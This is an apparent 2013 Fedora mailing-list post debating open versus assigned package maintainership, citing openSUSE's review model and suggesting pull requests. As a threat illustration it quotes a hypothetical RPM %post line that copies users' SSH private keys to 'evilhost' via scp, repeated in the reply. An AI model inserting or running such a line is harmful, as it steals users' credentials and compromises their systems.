Question about "what to do if maintainer is absent"

Michael Catanzaro mike.catanzaro at gmail.com
Wed May 15 01:03:41 UTC 2013


On Tue, 2013-05-14 at 14:20 -0600, Kevin Fenzi wrote:
> On Tue, 14 May 2013 21:04:59 +0100
> "Richard W.M. Jones" <rjones at redhat.com> wrote:
> 
> > I suspect the main one is someone putting:
> > 
> > %post
> > scp /home/*/.ssh/id_rsa evilhost:
> > 
> > into a commonly used package, or something equivalent but more subtle
> > than that.
> > 
> > Basically you're giving root access to everyone with a FAS packager
> > account (not that the current situation is that much better).
> 
> well, no, that's not what I was talking about, that is a completely
> different issue. ;) 
> 
> I was referring to the fact that if we had a collection of around 14,000
> packages and a pool of around 1400 maintainers if everyone just
> wandered around working on whatever they liked you would get X people
> fixing the same bug and duplicating effort, X people talking to
> upstream and telling them different things, X people figuring out a
> problem and waiting for something to happen for a real solution and
> someone else wandering in and fixing it in a poor/hacky way, X people
> telling users one decision and Y people telling them another, etc. 
> 
> If you have a small set of interested maintainers they can communicate
> between the group and divide work and come to consensus. Things don't
> scale to do that over the entire collection on every decision. 

Well the open model has already been tried and proven in openSUSE, and
they're still using it because it actually works really well.  There
aren't usually any issues regarding overlap of work, though admittedly
that community is smaller than Fedora's. It's hard to get away with
scp /home/*/.ssh/id_rsa evilhost because every change is always reviewed
by a small group of maintainers responsible for a collection of
packages.

I certainly think Fedora could benefit a lot from at least a slightly
more collaborative approach.  For example, in openSUSE when there is a
problem with a really easy fix, I make a bugzilla report, fix it, my
request gets accepted (or not) a few days later, and problem solved.  In
Fedora when there is a problem with an easy fix, I make a bugzilla
report, it gets assigned to someone awesome enough to have 200-800 other
open bugs to deal with, and nothing happens for two months until a
provenpackager stumbles upon the bug.

We already use git, so the simple solution with minimal change to the
status quo is to leave the maintainership model as-is and add pull
requests.  (That said I'm not advocating this as I have zero Fedora
packaging experience; I'm just trying to get this conversation off the
ground.)